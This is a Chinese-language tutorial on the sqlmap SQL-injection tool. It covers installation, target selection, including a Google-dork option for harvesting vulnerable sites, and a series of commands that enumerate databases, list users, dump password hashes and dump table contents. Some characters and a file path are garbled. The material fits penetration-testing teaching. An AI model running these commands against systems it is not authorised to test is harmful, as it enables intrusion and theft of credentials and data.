官网
官方用户手册
ttps://github.com/sqlmapproject/sqlmap/wiki
简介
sqlmap是一个开源渗透测试工具,它可以自动执行检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎,拥有针对极限渗透测试的众多细分功能,及数据库指纹识别,从数据库获取数据,访问基础文件系统以及通过外部连接在操作系统上执行命令。
SQL注入类型涵盖:
基于布尔的盲注
基于时间的盲注
基于错误
基于UNION的查询
堆栈查询
安装
方式一:通过kali linux 执行安全测试,SqlMap已安装
方式二:使用windows进行测试,首先安装python,然后通过pip 安装sqlmap
pip install --upgrade sqlmap
方式三:使用其他linux系统,安装Python--->安装sqlmap
使用
1、指定目标自动扫描检测
1) 直连数据库
sqlmap.py -d "mysql://root:root@127.0.0.1:3306/DISSchool"
2) 指定目标URL
sqlmap.py -u http://192.168.56.102:8080/user.php?id=0
URL中必须包含参数
3) 从Burp或WebScarab的代理日志中解析目标
sqlmap.py -l ../proxy.log
使用参数“-l”指定一个BurpSuite或WebScarab的代理日志文件,Sqlmap将从日志文件中解析出可能的攻击目标,并逐个尝试进行注入。该参数后跟一个表示日志文件的路径。推荐使用BurpSuite+SqlMap的方式。
4) 从站点地图文件中解析目标
sqlmap.py -x http://www.6eat.com/sitemap.xml
5) 从文本文件中解析目标
sqlmap.py -m url.txt
可用将多个URL以一行一个的格式保存在文本文件中,然后使用参数“-m”,后跟该文本文件路径,让Sqlmap依次读取文件中的URL作为攻击目标。
6) 从文件载入HTTP请求
sqlmap.py -r get.txt
7) 将Google搜索结果作为攻击目标
sqlmap.py -g "inurl:".php?id=1""
8) 从配置文件中载入攻击目标
使用参数“-c”指定一个配置文件(如:sqlmap.conf),Sqlmap会解析该配置文件,按照该配置文件的配置执行动作。配置文件中可以指定攻击目标,实际上除了攻击目标外,配置文件还可以指定各种参数的值。
Sqlmap的安装目录中有一个名为sqlmap.conf的文件,该文件是配置文件的模板。
2、按照策略人工检测
Get 注入举例:
1、 sqlmap.py -u "XXXURLmusthaveparameter" --batch
--batch,不用每次都提示作选择[Y/N]
2、sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" –dbms mysql –v 3
#指定数据库类型为mysql,级别为3(v 可以设置6个等级,用来控制显示不同的信息,一般选3就行了,默认使用1级,级别越高,检测越全面)
Post 注入举例:
1)使用抓包工具抓取post 请求包,保存在txt文件中
sqlmap -r “c: ools equest.txt” -p “username” –dbms mysql
#-r 从一个文件中载入HTTP请求
#-p 指定username参数
暴库
#扫描数据库信息
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" --dbs
#当前使用的数据库
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" --current-db
#数据库使用账户
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" --current-user#列出数据库所有用户
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" --users
#列出数据库中所有账户-对应的密码哈希
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" --passwords#列出数据库中的表 ,D:指定数据库
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" -D xx库 –tables
#列出数据库表中的所有字段信息
sqlmap.py -u "http://192.168.12.157:30336/#/login?id=1" -D xx库 -T xx表 --columns
#列出字段内容,--dump 打印
sqlmap.py -u "http://xxxxxx/products.asp?id=56" -D xx库 -T xx表 -C "字段" –dump
参考: